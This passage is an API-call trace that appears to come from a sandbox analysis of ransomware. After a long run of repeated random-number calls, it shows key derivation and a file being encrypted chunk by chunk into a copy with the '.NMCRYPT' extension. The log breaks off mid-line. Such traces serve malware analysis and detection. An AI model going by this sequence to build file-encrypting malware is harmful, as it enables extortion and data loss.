CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.022] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0153.022] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0153.022] CryptCreateHash (in: hProv=0x8e3b28, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447c4 | out: phHash=0x1d4447c4) returned 1 [0153.023] CryptHashData (hHash=0x9ad7b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.023] CryptDeriveKey (in: hProv=0x8e3b28, Algid=0x6610, hBaseData=0x9ad7b8, dwFlags=0x4, phKey=0x1d4447c8 | out: phKey=0x1d4447c8*=0x9ad678) returned 1 [0153.023] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0153.023] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0153.023] wcslen (_String="\\\\?\\") returned 0x4 [0153.023] CryptDuplicateKey (in: hKey=0x9ad678, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad7f8) returned 1 [0153.023] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0153.023] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0153.184] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=44544) returned 1 [0153.184] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0153.185] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.191] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.191] GetLastError () returned 0x0 [0153.191] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.251] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.252] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.252] GetLastError () returned 0x0 [0153.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.252] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.252] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.252] GetLastError () returned 0x0 [0153.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.252] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.252] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.252] GetLastError () returned 0x0 [0153.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.252] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.252] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.252] GetLastError () returned 0x0 [0153.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.252] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.252] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.252] GetLastError () returned 0x0 [0153.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.252] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.253] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.253] GetLastError () returned 0x0 [0153.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.253] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.253] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.253] GetLastError () returned 